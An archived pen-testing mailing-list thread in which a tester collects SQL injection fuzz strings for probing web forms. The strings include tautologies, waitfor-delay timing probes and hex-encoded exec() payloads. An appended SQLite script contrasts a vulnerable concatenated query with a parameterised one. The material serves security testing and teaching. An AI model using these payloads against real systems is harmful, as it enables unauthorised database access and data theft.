Re: SQL Injection Strings

From: Marcus (x-ray_at_twlc.net)
Date: 06/28/04

    To: "Jeremy Junginger" <jj@act.com>
    Date: Mon, 28 Jun 2004 03:08:39 -0300
    
    

    I know one that works.
     ' or '1
     ' or ' 1

    Marcus
    ----- Original Message -----
    From: Jeremy Junginger <jj@act.com>
    To: <pen-test@securityfocus.com>
    Sent: Friday, June 25, 2004 12:01 PM
    Subject: SQL Injection Strings

    Good Morning,

    I'm customizing an http proxy that's feeding some POST parameters into web
    forms to test for SQL injections. I figured this would be the group to help
    put together a comprehensive list of "fuzz strings" to feed into the forms
    to test them. Here's what I have so far. I know it's far from complete.
    Please add any additional strings that you think may be helpful, or perhaps
    a link to an archived thread that has already discussed this?!?:

    'sqlvuln
    '+sqlvuln
    sqlvuln;
    (sqlvuln)
    a' or 1=1--
    a" or 1=1--
    a" or "a" = "a
    a' or 'a' = 'a
    1 or 1=1
    a' waitfor delay '0:0:10'--
    1 waitfor delay '0:0:10'--
    declare @q nvarchar (4000) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000
    declare @s varchar(22) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
    declare @q nvarchar (4000) select @q = 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
    declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e exec(@s)

    And if you're feeling even more generous, perhaps you have some suggestions
    on checking the response. I'm doing a regex search for the following to
    determine interesting strings. Of course I still have to take a look at
    some of the 200 responses to see if the waitfor and version commands worked :)

    HTTP/[0-9].[0-9] 500
    [Ee]rror
    (My)?SQL

    Thanks guys!

    -Jeremy
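An added illustration, not part of the original thread: the strings above only "work" because the application splices user input into the SQL text. The script below runs a few of the thread's strings through a concatenated query and through a parameterised one, using Python's sqlite3 against a constructed in-memory table (the table, names and helper functions are assumptions for the demo; behaviour of `' or '1` and `--` is SQLite's, other engines differ).

```python
import sqlite3

# Constructed sample data: an in-memory table with two users.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s1"), ("bob", "s2")])
    return conn

def lookup_concatenated(conn, name):
    """Vulnerable form: the input becomes part of the SQL text, so a quote
    in the input ends the literal and the rest is parsed as SQL."""
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_parameterised(conn, name):
    """Fixed form: the value travels separately from the SQL text, so a
    quote in the input is only data and can never become syntax."""
    sql = "SELECT name FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]

def compare(payload):
    """Run one string from the thread through both versions and return
    (result of the vulnerable query, result of the parameterised query).
    A parse error in the vulnerable version is the '500'/'[Ee]rror' signal
    the original post greps responses for."""
    conn = make_db()
    try:
        vuln = lookup_concatenated(conn, payload)
    except sqlite3.Error as e:
        vuln = f"error: {e}"
    safe = lookup_parameterised(conn, payload)
    return vuln, safe

if __name__ == "__main__":
    for p in ["alice", "' or '1", "a' or 'a' = 'a", "a' or 1=1--", "'sqlvuln"]:
        print(repr(p), "->", compare(p))
```

The tautology strings return every row from the concatenated query and nothing from the parameterised one; the lone-quote string produces a parse error only in the concatenated version.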
